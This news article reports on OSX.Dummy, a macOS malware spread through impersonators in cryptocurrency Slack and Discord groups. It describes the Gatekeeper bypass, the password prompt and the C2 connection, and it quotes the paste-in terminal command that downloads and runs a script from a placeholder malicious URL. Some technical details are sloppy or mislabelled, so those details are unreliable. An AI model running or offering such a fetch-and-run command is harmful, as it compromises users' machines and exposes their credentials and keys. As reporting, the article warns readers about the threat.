Hackers have allegedly targeted cryptocurrency-focused groups on workplace-emulator Slack and gaming-forum Discord for discussing cryptocurrencies to infiltrate computers with “cryptojacking” software.
Discord and Slack Users Affected
Identified as OSX.Dummy, the MacOS-based malware is not as sophisticated as other masterfully-written hacking code, yet allows “arbitrary code execution on machines that it can get embedded into.”
As stated, researchers from cybersecurity consortium Unix found evidence of the OSX.Dummy, with Remco Verhoef of SANS’ InfoSec confirming a series of malicious attacks on macOS Slack applications on June 30, 2018.
Reportedly, several chatrooms on Discord and Slack have raised issues with system administrators about people who impersonate influential group members and send an unsuspecting link to a “useful” cryptocurrency mobile app.
The Malicious Code
On installing, the app downloads and executes the binary script “cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script.” The script is a 34 MB file and contains the OSX.Dummy software.
The script is a “regular” mach064 binary and executes itself on a MacOs system. Due to its obscurity, online malware scanners and inbuilt antivirus software fail to recognize the code as a threat.
Usually, the unsigned binary OSX.Dummy file cannot run on an OS due to defined security protocol. However, macOS security subroutine, “Gatekeeper,” does not check files that have been exclusively downloaded by the user and run in a system terminal, which notably, is the only way to run the “helpful” software.
Subsequently, the software prompts users to enter their master password, which provides the unauthorized code access to all underlying data, features, and password of the victim system. As a final step, the victim computer automatically connects to a C2 server, giving the attackers full access to the machine.
As the victim was from a cryptocurrency-related forum, this process provides attackers direct access to private addresses, emails, passwords, and security keys of the user, proving to be a basic yet effective “cryptojacking” process.
The new cyber threat of Cryptojacking is loosely defined as hackers infiltrating a victim’s computer to use their processing power to mine cryptocurrencies. However, the relatively low security measures exercised by businesses and users alike make the cryptocurrency sector a soft and highly profitable target. As reported by BTCManager in June 2018, the illicit activity of mining cryptocurrencies from a victim computer has surged by 629 percent in 2018 alone, with attackers showing no signs of stopping any time soon.